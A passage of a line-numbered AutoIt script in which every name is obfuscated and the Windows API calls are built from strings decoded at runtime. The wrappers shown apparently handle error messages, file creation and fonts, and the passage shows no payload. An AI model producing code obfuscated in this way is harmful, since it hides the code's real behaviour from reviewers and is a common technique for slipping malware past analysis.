  1359.     EndIf
  1360.     Local $a505a20190d = DllCall($a14eb10383d, $a33eb205457, $a07eb301916, $a43eb40241a, $a3edbf02529, $a23eb505319, $a1aeb001159)
  1361.     If @error Then Return SetError(@error, @extended, False)
  1362.     Return $a505a20190d[Number($a30eb601000)]
  1363. EndFunc
  1364.  
  1365. Func a5400802212($a49eb70275a, $a2feb805542, $a27eb906150, $a21eba0242b, $a1debb02625, $a31ebc02f09, $a41ebd03c4a, $a32ebe04c5d, $a10ebf0002d)
  1366.     If NOT IsDeclared("SSA5400802212") Then
  1367.         Global $a30fb00562a = a2b00005424($os[1349]), $a46fb10291d = a2b00005424($os[1350]), $a32fb206107 = a2b00005424($os[1351]), $a1bfb30272b = a2b00005424($os[1352]), $a3afb40081e = a2b00005424($os[1353]), $a5efb503445 = a2b00005424($os[1354]), $a5dfb60453f = a2b00005424($os[1355]), $a5efb700423 = a2b00005424($os[1356]), $a20fb804a0a = a2b00005424($os[1357]), $a1dfb904946 = a2b00005424($os[1358]), $a16fba00b46 = a2b00005424($os[1359]), $a5bfbb01306 = a2b00005424($os[1360]), $a04fbc03c16 = a2b00005424($os[1361])
  1368.         Global $ssa5400802212 = 1
  1369.     EndIf
  1370.     Local $a505a20190d = DllCall($a30fb00562a, $a46fb10291d, $a32fb206107, $a1bfb30272b, $a49eb70275a, $a3afb40081e, $a2feb805542, $a5efb503445, $a27eb906150, $a5dfb60453f, $a21eba0242b, $a5efb700423, $a1debb02625, $a20fb804a0a, $a31ebc02f09, $a1dfb904946, $a41ebd03c4a, $a16fba00b46, $a32ebe04c5d, $a5bfbb01306, $a10ebf0002d)
  1371.     If @error Then Return SetError(@error, @extended, False)
  1372.     Return $a505a20190d[Number($a04fbc03c16)]
  1373. EndFunc
  1374.  
  1375. Func a4b00904e3f($a4bfbd05013, $a2cfbe0400a, $a47ca20000b, $a0fca303605)
  1376.     If NOT IsDeclared("SSA4B00904E3F") Then
  1377.         Global $a12fbf0031c = a2b00005424($os[1362]), $a3e0c004848 = a2b00005424($os[1363]), $a260c103e1d = a2b00005424($os[1364]), $a070c202c18 = a2b00005424($os[1365]), $a140c30532f = a2b00005424($os[1366]), $a370c401249 = a2b00005424($os[1367]), $a280c504e41 = a2b00005424($os[1368]), $a380c602739 = a2b00005424($os[1369]), $a0e0c706310 = a2b00005424($os[1370])
  1378.         Global $ssa4b00904e3f = 1
  1379.     EndIf
  1380.     Local $a505a20190d = DllCall($a12fbf0031c, $a3e0c004848, $a260c103e1d, $a070c202c18, $a4bfbd05013, $a140c30532f, $a2cfbe0400a, $a370c401249, $a47ca20000b, $a280c504e41, $a0fca303605)
  1381.     If @error Then Return SetError(@error, @extended, -Number($a380c602739))
  1382.     Return $a505a20190d[Number($a0e0c706310)]
  1383. EndFunc
  1384.  
  1385. Func a1b00a03a38($a610c804129, $a3eca000d54, $a0a0c901b0d, $a47ca20000b, $a0fca303605)
  1386.     If NOT IsDeclared("SSA1B00A03A38") Then
  1387.         Global $a3c0ca05a59 = a2b00005424($os[1371]), $a300cb00763 = a2b00005424($os[1372]), $a290cc05b48 = a2b00005424($os[1373]), $a240cd04a23 = a2b00005424($os[1374]), $a0f0ce00d4e = a2b00005424($os[1375]), $a3a0cf00850 = a2b00005424($os[1376]), $a351c00133b = a2b00005424($os[1377]), $a491c101014 = a2b00005424($os[1378]), $a601c205a51 = a2b00005424($os[1379]), $a311c302524 = a2b00005424($os[1380])
  1388.         Global $ssa1b00a03a38 = 1
  1389.     EndIf
  1390.     Local $a505a20190d = DllCall($a3c0ca05a59, $a300cb00763, $a290cc05b48, $a240cd04a23, $a610c804129, $a0f0ce00d4e, $a3eca000d54, $a3a0cf00850, $a0a0c901b0d, $a351c00133b, $a47ca20000b, $a491c101014, $a0fca303605)
  1391.     If @error Then Return SetError(@error, @extended, -Number($a601c205a51))
  1392.     Return $a505a20190d[Number($a311c302524)]
  1393. EndFunc
  1394.  
  1395. Func a1f00b02b09($a3eca000d54, ByRef $a4d1c401e56)
  1396.     If NOT IsDeclared("SSA1F00B02B09") Then
  1397.         Global $a391c50215a = a2b00005424($os[1381]), $a331c600a61 = a2b00005424($os[1382]), $a0f1c704813 = a2b00005424($os[1383]), $a411c803510 = a2b00005424($os[1384]), $a0e1c900649 = a2b00005424($os[1385])
  1398.         Global $ssa1f00b02b09 = 1
  1399.     EndIf
  1400.     DllCall($a391c50215a, $a331c600a61, $a0f1c704813, $a411c803510, $a3eca000d54, $a0e1c900649, $a4d1c401e56)
  1401.     Return SetError(@error, @extended, $a4d1c401e56)
  1402. EndFunc
  1403.  
  1404. Func a4100c04723($a491ca0352d)
  1405.     If NOT IsDeclared("SSA4100C04723") Then
  1406.         Global $a4d1cb05b43 = a2b00005424($os[1386]), $a521cc0081d = a2b00005424($os[1387]), $a231cd00212 = a2b00005424($os[1388]), $a071ce0114a = a2b00005424($os[1389]), $a291cf04f22 = a2b00005424($os[1390])
  1407.         Global $ssa4100c04723 = 1
  1408.     EndIf
  1409.     Local $a505a20190d = DllCall($a4d1cb05b43, $a521cc0081d, $a231cd00212, $a071ce0114a, $a491ca0352d)
  1410.     If @error Then Return SetError(@error, @extended, False)
  1411.     Return $a505a20190d[Number($a291cf04f22)]
  1412. EndFunc
  1413.  
  1414. Func a5e00d04529($a502c005050, $a1d2c10575f, $a412c202342, $a242c304261)
  1415.     If NOT IsDeclared("SSA5E00D04529") Then
  1416.         Global $a3e2c405c62 = a2b00005424($os[1391]), $a1f2c50632e = a2b00005424($os[1392]), $a132c600215 = a2b00005424($os[1393]), $a2c2c70025f = a2b00005424($os[1394]), $a4a2c80173c = a2b00005424($os[1395]), $a3b2c905e5c = a2b00005424($os[1396]), $a512ca01133 = a2b00005424($os[1397]), $a0d2cb00516 = a2b00005424($os[1398]), $a4b2cc03e13 = a2b00005424($os[1399])
  1417.         Global $ssa5e00d04529 = 1
  1418.     EndIf
  1419.     Local $a505a20190d = DllCall($a3e2c405c62, $a1f2c50632e, $a132c600215, $a2c2c70025f, $a502c005050, $a4a2c80173c, $a1d2c10575f, $a3b2c905e5c, $a412c202342, $a512ca01133, $a242c304261)
  1420.     If @error Then Return SetError(@error, @extended, Number($a0d2cb00516))
  1421.     Return $a505a20190d[Number($a4b2cc03e13)]
  1422. EndFunc
  1423.  
  1424. Func a5e00e01658()
  1425.     If NOT IsDeclared("SSA5E00E01658") Then
  1426.         Global $a5d2ce02341 = a2b00005424($os[1400]), $a173c00450f = a2b00005424($os[1401]), $a343c202026 = a2b00005424($os[1402]), $a503c405506 = a2b00005424($os[1403]), $a423c60552f = a2b00005424($os[1404]), $a3c3c802024 = a2b00005424($os[1405]), $a053ca0404b = a2b00005424($os[1406]), $a533cc03b43 = a2b00005424($os[1407]), $a273ce04104 = a2b00005424($os[1408]), $a634c001c05 = a2b00005424($os[1409]), $a024c202918 = a2b00005424($os[1410]), $a624c404e4a = a2b00005424($os[1411]), $a5d4c602660 = a2b00005424($os[1412]), $a234c80322f = a2b00005424($os[1413]), $a1d4ca00c35 = a2b00005424($os[1414]), $a0c4cc01601 = a2b00005424($os[1415]), $a3a4cd04618 = a2b00005424($os[1416]), $a3d4ce03405 = a2b00005424($os[1417]), $a624cf01942 = a2b00005424($os[1418]), $a345c003b23 = a2b00005424($os[1419]), $a2b5c103945 = a2b00005424($os[1420]), $a385c203601 = a2b00005424($os[1421]), $a555c301551 = a2b00005424($os[1422]), $a5e5c403f3d = a2b00005424($os[1423]), $a115c506108 = a2b00005424($os[1424]), $a015c604660 = a2b00005424($os[1425]), $a525c701b4a = a2b00005424($os[1426]), $a495c803e02 = a2b00005424($os[1427]), $a585c904b2d = a2b00005424($os[1428]), $a5b5ca01d51 = a2b00005424($os[1429]), $a0c5cb00b51 = a2b00005424($os[1430]), $a015cc05440 = a2b00005424($os[1431]), $a4b5cd05b33 = a2b00005424($os[1432]), $a405ce00016 = a2b00005424($os[1433]), $a1c5cf00728 = a2b00005424($os[1434]), $a4a6c005056 = a2b00005424($os[1435]), $a516c105601 = a2b00005424($os[1436]), $a586c200011 = a2b00005424($os[1437]), $a1f6c301e2e = a2b00005424($os[1438]), $a176c402654 = a2b00005424($os[1439]), $a606c50375d = a2b00005424($os[1440]), $a236c601208 = a2b00005424($os[1441]), $a636c702c0b = a2b00005424($os[1442]), $a226c801608 = a2b00005424($os[1443]), $a076c90350e = a2b00005424($os[1444]), $a036ca00b03 = a2b00005424($os[1445]), $a4a6cb05961 = a2b00005424($os[1446]), $a2b6cc04b4f = a2b00005424($os[1447]), $a536cd04808 = a2b00005424($os[1448]), $a606ce01509 = a2b00005424($os[1449]), $a466cf01a2a = a2b00005424($os[1450]), $a4f7c001807 = a2b00005424($os[1451]), $a397c106059 = a2b00005424($os[1452])
  1427.         Global $a5c7c204b2a = a2b00005424($os[1453]), $a5b7c305651 = a2b00005424($os[1454]), $a4b7c405a16 = a2b00005424($os[1455]), $a5c7c501c45 = a2b00005424($os[1456]), $a4a7c603f00 = a2b00005424($os[1457]), $a357c70173f = a2b00005424($os[1458]), $a067c80384a = a2b00005424($os[1459]), $a197c904007 = a2b00005424($os[1460]), $a4e7ca0413e = a2b00005424($os[1461]), $a1e7cb02329 = a2b00005424($os[1462]), $a3b7cc02b2d = a2b00005424($os[1463]), $a547cd0305e = a2b00005424($os[1464]), $a477ce0085d = a2b00005424($os[1465]), $a3b7cf05144 = a2b00005424($os[1466]), $a308c003d49 = a2b00005424($os[1467]), $a258c106002 = a2b00005424($os[1468]), $a2c8c200c19 = a2b00005424($os[1469]), $a148c30274f = a2b00005424($os[1470]), $a4b8c402b07 = a2b00005424($os[1471]), $a498c505728 = a2b00005424($os[1472]), $a248c601938 = a2b00005424($os[1473]), $a278c700352 = a2b00005424($os[1474]), $a0f8c801031 = a2b00005424($os[1475]), $a1d8c904a2f = a2b00005424($os[1476]), $a038ca0174c = a2b00005424($os[1477]), $a5b8cb00419 = a2b00005424($os[1478]), $a5c8cc03f00 = a2b00005424($os[1479]), $a398cd03917 = a2b00005424($os[1480]), $a508ce0103e = a2b00005424($os[1481]), $a4c8cf06124 = a2b00005424($os[1482]), $a639c00101b = a2b00005424($os[1483])
  1428.         Global $ssa5e00e01658 = 1
  1429.     EndIf
  1430.     Local Const $a582cd05429 = Number($a5d2ce02341)
  1431.     Local Const $a112cf05b46 = Number($a173c00450f)
  1432.     Local Const $a143c100f5e = Number($a343c202026)
  1433.     Local Const $a2d3c303f35 = Number($a503c405506)
  1434.     Local Const $a2d3c50413a = Number($a423c60552f)
  1435.     Local Const $a0b3c703841 = Number($a3c3c802024)
  1436.     Local Const $a103c905b13 = Number($a053ca0404b)
  1437.     Local Const $a603cb02730 = Number($a533cc03b43)
  1438.     Local Const $a5e3cd00b1e = Number($a273ce04104)
  1439.     Local Const $a343cf03517 = Number($a634c001c05)
  1440.     Local Const $a634c100d25 = Number($a024c202918)
  1441.     Local Const $a2e4c30404a = Number($a624c404e4a)
  1442.     Local Const $a5f4c502555 = Number($a5d4c602660)
  1443.     Local Const $a414c702936 = Number($a234c80322f)
  1444.     Local Const $a434c900c1d = Number($a1d4ca00c35)
  1445.     Local Const $a2f4cb00902 = Number($a0c4cc01601)
  1446.     Local $a505a20190d = DllCall($a3a4cd04618, $a3d4ce03405, $a624cf01942)
  1447.     If @error Then Return SetError(@error, @extended, Number($a345c003b23))
  1448.     Switch $a505a20190d[Number($a2b5c103945)]
  1449.         Case $a582cd05429
  1450.             Return SetError($a505a20190d[Number($a385c203601)], Number($a555c301551), $a5e5c403f3d & Execute($a115c506108) & $a015c604660 & Execute($a525c701b4a) & $a495c803e02)
  1451.         Case $a112cf05b46
  1452.             Return SetError($a505a20190d[Number($a585c904b2d)], Number($a5b5ca01d51), $a0c5cb00b51)
  1453.         Case $a143c100f5e
  1454.             Return SetError($a505a20190d[Number($a015cc05440)], Number($a4b5cd05b33), $a405ce00016 & Execute($a1c5cf00728) & $a4a6c005056)
  1455.         Case $a2d3c303f35
  1456.             Return SetError($a505a20190d[Number($a516c105601)], Number($a586c200011), $a1f6c301e2e)
  1457.         Case $a2d3c50413a
  1458.             Return SetError($a505a20190d[Number($a176c402654)], Number($a606c50375d), $a236c601208)
  1459.         Case $a0b3c703841
  1460.             Return SetError($a505a20190d[Number($a636c702c0b)], Number($a226c801608), $a076c90350e)
  1461.         Case $a103c905b13
  1462.             Return SetError($a505a20190d[Number($a036ca00b03)], Number($a4a6cb05961), $a2b6cc04b4f)
  1463.         Case $a603cb02730
  1464.             Return SetError($a505a20190d[Number($a536cd04808)], Number($a606ce01509), $a466cf01a2a)
  1465.         Case $a5e3cd00b1e
  1466.             Return SetError($a505a20190d[Number($a4f7c001807)], Number($a397c106059), $a5c7c204b2a & Execute($a5b7c305651) & $a4b7c405a16)
  1467.         Case $a343cf03517
  1468.             Return SetError($a505a20190d[Number($a5c7c501c45)], Number($a4a7c603f00), $a357c70173f & Execute($a067c80384a) & $a197c904007)
  1469.         Case $a634c100d25
  1470.             Return SetError($a505a20190d[Number($a4e7ca0413e)], Number($a1e7cb02329), $a3b7cc02b2d & Execute($a547cd0305e) & $a477ce0085d)
  1471.         Case $a2e4c30404a
  1472.             Return SetError($a505a20190d[Number($a3b7cf05144)], Number($a308c003d49), $a258c106002)
  1473.         Case $a5f4c502555
  1474.             Return SetError($a505a20190d[Number($a2c8c200c19)], Number($a148c30274f), $a4b8c402b07)
  1475.         Case $a414c702936
  1476.             Return SetError($a505a20190d[Number($a498c505728)], Number($a248c601938), $a278c700352 & Execute($a0f8c801031) & $a1d8c904a2f)
  1477.         Case $a434c900c1d
  1478.             Return SetError($a505a20190d[Number($a038ca0174c)], Number($a5b8cb00419), $a5c8cc03f00)
  1479.         Case $a2f4cb00902
  1480.             Return SetError($a505a20190d[Number($a398cd03917)], Number($a508ce0103e), $a4c8cf06124)
  1481.     EndSwitch
  1482.     Return Hex($a505a20190d[Number($a639c00101b)])
  1483. EndFunc
  1484.  
  1485. Func a6200f0584a($a3a9c101b29)
  1486.     If NOT IsDeclared("SSA6200F0584A") Then
  1487.         Global $a269c203540 = a2b00005424($os[1484]), $a229c303a05 = a2b00005424($os[1485]), $a5a9c400249 = a2b00005424($os[1486]), $a349c504813 = a2b00005424($os[1487]), $a329c60602a = a2b00005424($os[1488]), $a1c9c703319 = a2b00005424($os[1489])
  1488.         Global $ssa6200f0584a = 1
  1489.     EndIf
  1490.     Local $a505a20190d = DllCall($a269c203540, $a229c303a05, $a5a9c400249, $a349c504813, $a3a9c101b29)
  1491.     If @error Then Return SetError(@error, @extended, Number($a329c60602a))
  1492.     Return $a505a20190d[Number($a1c9c703319)]
  1493. EndFunc
  1494.  
  1495. Func a0d1000142c($a21eba0242b, $a1debb02625, $a189c803f0e = 1, $a219c903f13 = 1, $a5b9ca02d5a = 0)
  1496.     If NOT IsDeclared("SSA0D1000142C") Then
  1497.         Global $a059cb05f27 = a2b00005424($os[1490]), $a109cc05048 = a2b00005424($os[1491]), $a479cd00655 = a2b00005424($os[1492]), $a339ce01929 = a2b00005424($os[1493]), $a139cf00c10 = a2b00005424($os[1494]), $a2aac00510b = a2b00005424($os[1495]), $a4dac10330c = a2b00005424($os[1496]), $a4bac20365f = a2b00005424($os[1497]), $a2aac300055 = a2b00005424($os[1498]), $a38ac402f18 = a2b00005424($os[1499])
  1498.         Global $ssa0d1000142c = 1
  1499.     EndIf
  1500.     Local $a505a20190d = DllCall($a059cb05f27, $a109cc05048, $a479cd00655, $a339ce01929, $a21eba0242b, $a139cf00c10, $a1debb02625, $a2aac00510b, $a189c803f0e, $a4dac10330c, $a219c903f13, $a4bac20365f, $a5b9ca02d5a)
  1501.     If @error Then Return SetError(@error, @extended, Number($a2aac300055))
  1502.     Return $a505a20190d[Number($a38ac402f18)]
  1503. EndFunc
  1504.  
  1505. Func a4910105f41($a32ac505260, $a21eba0242b, $a1debb02625)
  1506.     If NOT IsDeclared("SSA4910105F41") Then
  1507.         Global $a13ac600223 = a2b00005424($os[1500]), $a2eac70601a = a2b00005424($os[1501]), $a18ac801153 = a2b00005424($os[1502]), $a46ac90575a = a2b00005424($os[1503]), $a47aca0095f = a2b00005424($os[1504]), $a1eacb01c42 = a2b00005424($os[1505]), $a27acc04e0d = a2b00005424($os[1506]), $a1dacd01a2d = a2b00005424($os[1507])
  1508.         Global $ssa4910105f41 = 1
  1509.     EndIf
  1510.     Local $a505a20190d = DllCall($a13ac600223, $a2eac70601a, $a18ac801153, $a46ac90575a, $a32ac505260, $a47aca0095f, $a21eba0242b, $a1eacb01c42, $a1debb02625)
  1511.     If @error Then Return SetError(@error, @extended, Number($a27acc04e0d))
  1512.     Return $a505a20190d[Number($a1dacd01a2d)]
  1513. EndFunc
  1514.  
  1515. Func a341020090f($a32ac505260)
  1516.     If NOT IsDeclared("SSA341020090F") Then
  1517.         Global $a55ace02207 = a2b00005424($os[1508]), $a3facf0162b = a2b00005424($os[1509]), $a61bc000a2b = a2b00005424($os[1510]), $a3dbc10053a = a2b00005424($os[1511]), $a29bc202053 = a2b00005424($os[1512]), $a3abc30211b = a2b00005424($os[1513])
  1518.         Global $ssa341020090f = 1
  1519.     EndIf
  1520.     Local $a505a20190d = DllCall($a55ace02207, $a3facf0162b, $a61bc000a2b, $a3dbc10053a, $a32ac505260)
  1521.     If @error Then Return SetError(@error, @extended, Number($a29bc202053))
  1522.     Return $a505a20190d[Number($a3abc30211b)]
  1523. EndFunc
  1524.  
  1525. Func a081030002b($a39bc406034 = 0, $a62bc500715 = True, $a5fbc603e36 = True, $a00bc705e51 = "")
  1526.     If NOT IsDeclared("SSA081030002B") Then
  1527.         Global $a2bbc901d56 = a2b00005424($os[1514]), $a46bca02c3f = a2b00005424($os[1515]), $a08bcb05834 = a2b00005424($os[1516]), $a04bcc04200 = a2b00005424($os[1517]), $a5cbcd01634 = a2b00005424($os[1518]), $a07bce04056 = a2b00005424($os[1519]), $a4ebcf04310 = a2b00005424($os[1520]), $a61cc00221a = a2b00005424($os[1521]), $a3fcc103217 = a2b00005424($os[1522]), $a0acc203b30 = a2b00005424($os[1523]), $a25cc302a4a = a2b00005424($os[1524])
  1528.         Global $ssa081030002b = 1
  1529.     EndIf
  1530.     Local $a08bc800f47 = $a2bbc901d56
  1531.     If $a00bc705e51 = "" Then
  1532.         $a00bc705e51 = Number($a46bca02c3f)
  1533.         $a08bc800f47 = $a08bcb05834
  1534.     EndIf
  1535.     Local $a505a20190d = DllCall($a04bcc04200, $a5cbcd01634, $a07bce04056, $a4ebcf04310, $a39bc406034, $a61cc00221a, $a62bc500715, $a3fcc103217, $a5fbc603e36, $a08bc800f47, $a00bc705e51)
  1536.     If @error Then Return SetError(@error, @extended, Number($a0acc203b30))
  1537.     Return $a505a20190d[Number($a25cc302a4a)]
  1538. EndFunc
  1539.  
  1540. Func a1610401621($a30cc405a22, $a23cc503509, $a49cc60131c = 4, $a56cc70255e = 0, $a61cc802d36 = 0, $a5ccc900c31 = 0)
  1541.     If NOT IsDeclared("SSA1610401621") Then
  1542.         Global $a5bccb01e63 = a2b00005424($os[1525]), $a3dccd0573f = a2b00005424($os[1526]), $a12ccf00c37 = a2b00005424($os[1527]), $a23dc104a63 = a2b00005424($os[1528]), $a60dc20573a = a2b00005424($os[1529]), $a45dc302231 = a2b00005424($os[1530]), $a12dc402c60 = a2b00005424($os[1531]), $a3bdc500016 = a2b00005424($os[1532]), $a3ddc605715 = a2b00005424($os[1533]), $a4edc700d39 = a2b00005424($os[1534]), $a54dc804957 = a2b00005424($os[1535]), $a42dc904f0b = a2b00005424($os[1536]), $a31dca0134b = a2b00005424($os[1537]), $a4cdcb03c47 = a2b00005424($os[1538]), $a59dcc0313b = a2b00005424($os[1539]), $a31dcd05353 = a2b00005424($os[1540]), $a17dce03318 = a2b00005424($os[1541]), $a43dcf02e14 = a2b00005424($os[1542]), $a05ec00301a = a2b00005424($os[1543]), $a37ec102750 = a2b00005424($os[1544]), $a3eec20133f = a2b00005424($os[1545]), $a3cec305910 = a2b00005424($os[1546]), $a24ec400163 = a2b00005424($os[1547]), $a5fec502f3e = a2b00005424($os[1548]), $a4dec601134 = a2b00005424($os[1549]), $a3fec70361b = a2b00005424($os[1550]), $a2eec802563 = a2b00005424($os[1551]), $a52ec903d3b = a2b00005424($os[1552]), $a1feca05e00 = a2b00005424($os[1553]), $a54ecb03e40 = a2b00005424($os[1554]), $a0decc03b25 = a2b00005424($os[1555]), $a03ecd04a62 = a2b00005424($os[1556]), $a0cece02c0a = a2b00005424($os[1557]), $a41ecf02616 = a2b00005424($os[1558]), $a13fc005b5c = a2b00005424($os[1559]), $a4afc104c4b = a2b00005424($os[1560]), $a18fc205736 = a2b00005424($os[1561]), $a0ffc304137 = a2b00005424($os[1562]), $a01fc405728 = a2b00005424($os[1563]), $a2cfc501303 = a2b00005424($os[1564]), $a25fc600513 = a2b00005424($os[1565]), $a2dfc705417 = a2b00005424($os[1566]), $a3cfc805f5b = a2b00005424($os[1567]), $a0ffc904d19 = a2b00005424($os[1568])
  1543.         Global $ssa1610401621 = 1
  1544.     EndIf
  1545.     Local $a19cca02939 = Number($a5bccb01e63), $a3bccc03c49 = Number($a3dccd0573f), $a00cce04b47 = Number($a12ccf00c37), $a41dc00261f = Number($a23dc104a63)
  1546.     If BitAND($a49cc60131c, Number($a60dc20573a)) <> Number($a45dc302231) Then $a19cca02939 = BitOR($a19cca02939, $a20baa02553)
  1547.     If BitAND($a49cc60131c, Number($a12dc402c60)) <> Number($a3bdc500016) Then $a19cca02939 = BitOR($a19cca02939, $a57bae0462a)
  1548.     If BitAND($a49cc60131c, Number($a3ddc605715)) <> Number($a4edc700d39) Then $a19cca02939 = BitOR($a19cca02939, $a2dbac03033)
  1549.     If BitAND($a56cc70255e, Number($a54dc804957)) <> Number($a42dc904f0b) Then $a3bccc03c49 = BitOR($a3bccc03c49, $a31ba603a51)
  1550.     If BitAND($a56cc70255e, Number($a31dca0134b)) <> Number($a4cdcb03c47) Then $a3bccc03c49 = BitOR($a3bccc03c49, $a34ba205f59)
  1551.     If BitAND($a56cc70255e, Number($a59dcc0313b)) <> Number($a31dcd05353) Then $a3bccc03c49 = BitOR($a3bccc03c49, $a5aba402b33)
  1552.     Switch $a23cc503509
  1553.         Case Number($a17dce03318)
  1554.             $a00cce04b47 = $a188a400003
  1555.         Case Number($a43dcf02e14)
  1556.             $a00cce04b47 = $a0d8a603501
  1557.         Case Number($a05ec00301a)
  1558.             $a00cce04b47 = $a138a806124
  1559.         Case Number($a37ec102750)
  1560.             $a00cce04b47 = $a328aa01406
  1561.         Case Number($a3eec20133f)
  1562.             $a00cce04b47 = $a5d8ac0283e
  1563.     EndSwitch
  1564.     If BitAND($a61cc802d36, Number($a3cec305910)) <> Number($a24ec400163) Then $a41dc00261f = BitOR($a41dc00261f, $a329ae0583c)
  1565.     If BitAND($a61cc802d36, Number($a5fec502f3e)) <> Number($a4dec601134) Then $a41dc00261f = BitOR($a41dc00261f, $a569a800b09)
  1566.     If BitAND($a61cc802d36, Number($a3fec70361b)) <> Number($a2eec802563) Then $a41dc00261f = BitOR($a41dc00261f, $a239a60305b)
  1567.     If BitAND($a61cc802d36, Number($a52ec903d3b)) <> Number($a1feca05e00) Then $a41dc00261f = BitOR($a41dc00261f, $a609aa05a57)
  1568.     Local $a505a20190d = DllCall($a54ecb03e40, $a0decc03b25, $a03ecd04a62, $a0cece02c0a, $a30cc405a22, $a41ecf02616, $a19cca02939, $a13fc005b5c, $a3bccc03c49, $a4afc104c4b, $a5ccc900c31, $a18fc205736, $a00cce04b47, $a0ffc304137, $a41dc00261f, $a01fc405728, Number($a2cfc501303))
  1569.     If @error OR $a505a20190d[Number($a25fc600513)] = Ptr(-Number($a2dfc705417)) Then Return SetError(@error, @extended, Number($a3cfc805f5b))
  1570.     Return $a505a20190d[Number($a0ffc904d19)]
  1571. EndFunc
  1572.  
  1573. Func a3310505138($a05fca02d25, $a45fcb03536, $a0ffcc02a28 = 0, $a46fcd00138 = 0, $a05fce03a5e = $a37ea00294b, $a54fcf01e12 = False, $a480d003041 = False, $a250d10244b = False, $a630d200d20 = $a2eea20115d, $a630d304a61 = $a27ea400a2e, $a110d40272d = $a0dea601c1b, $a390d504246 = $a28ea802b26, $a060d600248 = 0, $a220d702b2f = "Arial")
  1574.     If NOT IsDeclared("SSA3310505138") Then
  1575.         Global $a3f0d80034a = a2b00005424($os[1569]), $a100d900c53 = a2b00005424($os[1570]), $a220da0025a = a2b00005424($os[1571]), $a320db03831 = a2b00005424($os[1572]), $a2f0dc04f1a = a2b00005424($os[1573]), $a480dd0275a = a2b00005424($os[1574]), $a2e0de01562 = a2b00005424($os[1575]), $a050df0503f = a2b00005424($os[1576]), $a451d000017 = a2b00005424($os[1577]), $a251d101e0c = a2b00005424($os[1578]), $a071d200605 = a2b00005424($os[1579]), $a041d30574b = a2b00005424($os[1580]), $a4f1d405c32 = a2b00005424($os[1581]), $a431d500f1c = a2b00005424($os[1582]), $a311d60155e = a2b00005424($os[1583]), $a061d701944 = a2b00005424($os[1584]), $a451d805932 = a2b00005424($os[1585]), $a591d900d44 = a2b00005424($os[1586]), $a1f1da0161c = a2b00005424($os[1587])
  1576.         Global $ssa3310505138 = 1
  1577.     EndIf
  1578.     Local $a505a20190d = DllCall($a3f0d80034a, $a100d900c53, $a220da0025a, $a320db03831, $a05fca02d25, $a2f0dc04f1a, $a45fcb03536, $a480dd0275a, $a0ffcc02a28, $a2e0de01562, $a46fcd00138, $a050df0503f, $a05fce03a5e, $a451d000017, $a54fcf01e12, $a251d101e0c, $a480d003041, $a071d200605, $a250d10244b, $a041d30574b, $a630d200d20, $a4f1d405c32, $a630d304a61, $a431d500f1c, $a110d40272d, $a311d60155e, $a390d504246, $a061d701944, $a060d600248, $a451d805932, $a220d702b2f)
  1579.     If @error Then Return SetError(@error, @extended, Number($a591d900d44))
  1580.     Return $a505a20190d[Number($a1f1da0161c)]
  1581. EndFunc
  1582.  
  1583. Func a2010604003($a551db02607)
  1584.     If NOT IsDeclared("SSA2010604003") Then
  1585.         Global $a141dc05720 = a2b00005424($os[1588]), $a381dd0574b = a2b00005424($os[1589]), $a051de0613a = a2b00005424($os[1590]), $a0f1df0130f = a2b00005424($os[1591]), $a352d001556 = a2b00005424($os[1592]), $a192d100549 = a2b00005424($os[1593])
  1586.         Global $ssa2010604003 = 1
  1587.     EndIf
  1588.     Local $a505a20190d = DllCall($a141dc05720, $a381dd0574b, $a051de0613a, $a0f1df0130f, $a551db02607)
  1589.     If @error Then Return SetError(@error, @extended, Number($a352d001556))
  1590.     Return $a505a20190d[Number($a192d100549)]
  1591. EndFunc
  1592.  
  1593. Func a2510705d14($a052d201e19, $a21eba0242b, $a0b2d303851)
  1594.     If NOT IsDeclared("SSA2510705D14") Then
  1595.         Global $a542d400832 = a2b00005424($os[1594]), $a142d501961 = a2b00005424($os[1595]), $a122d603004 = a2b00005424($os[1596]), $a482d703a10 = a2b00005424($os[1597]), $a232d800117 = a2b00005424($os[1598]), $a502d903b5f = a2b00005424($os[1599]), $a352da04e24 = a2b00005424($os[1600]), $a442db0152d = a2b00005424($os[1601])
  1596.         Global $ssa2510705d14 = 1
  1597.     EndIf
  1598.     Local $a505a20190d = DllCall($a542d400832, $a142d501961, $a122d603004, $a482d703a10, $a052d201e19, $a232d800117, $a21eba0242b, $a502d903b5f, $a0b2d303851)
  1599.     If @error Then Return SetError(@error, @extended, Number($a352da04e24))
  1600.     Return $a505a20190d[Number($a442db0152d)]
  1601. EndFunc
  1602.  
  1603. Func a631080364c($a2e2dc05e09, $a462dd05633, $a5ccc900c31, $a622de02a47, $a0f2df01952, $a103d00243d, $a013d101e20, $a013d204a61, $a333d302617, $a5d3d40154c)
  1604.     If NOT IsDeclared("SSA631080364C") Then
  1605.         Global $a1c3d603d42 = a2b00005424($os[1602]), $a313d80302f = a2b00005424($os[1603]), $a063da03628 = a2b00005424($os[1604]), $a503db04447 = a2b00005424($os[1605]), $a373dc0243b = a2b00005424($os[1606]), $a473dd01902 = a2b00005424($os[1607]), $a603de05c0f = a2b00005424($os[1608]), $a543df01b5d = a2b00005424($os[1609]), $a3f4d00462c = a2b00005424($os[1610]), $a054d101263 = a2b00005424($os[1611]), $a484d204342 = a2b00005424($os[1612]), $a544d303034 = a2b00005424($os[1613]), $a264d404961 = a2b00005424($os[1614]), $a0c4d504760 = a2b00005424($os[1615]), $a094d605301 = a2b00005424($os[1616]), $a374d70590c = a2b00005424($os[1617]), $a5d4d80465f = a2b00005424($os[1618]), $a304d90042c = a2b00005424($os[1619]), $a344da00922 = a2b00005424($os[1620]), $a574db03b1b = a2b00005424($os[1621]), $a004dc05a60 = a2b00005424($os[1622]), $a514dd03649 = a2b00005424($os[1623]), $a534de0252a = a2b00005424($os[1624]), $a1f4df03a17 = a2b00005424($os[1625])
  1606.         Global $ssa631080364c = 1
  1607.     EndIf
  1608.     Local $a023d505255 = Number($a1c3d603d42)
  1609.     Local $a163d704e5b = $a313d80302f, $a343d90461b = $a063da03628
  1610.     If $a2e2dc05e09 = "" Then
  1611.         $a163d704e5b = $a503db04447
  1612.         $a2e2dc05e09 = Number($a373dc0243b)
  1613.     EndIf
  1614.     If $a462dd05633 <> "" Then
  1615.         $a023d505255 = DllStructCreate($a473dd01902 & Number($a603de05c0f) + Number($a543df01b5d) & $a3f4d00462c)
  1616.         DllStructSetData($a023d505255, $a054d101263, $a462dd05633)
  1617.     EndIf
  1618.     If $a013d204a61 = "" Then
  1619.         $a343d90461b = $a484d204342
  1620.         $a013d204a61 = Number($a544d303034)
  1621.     EndIf
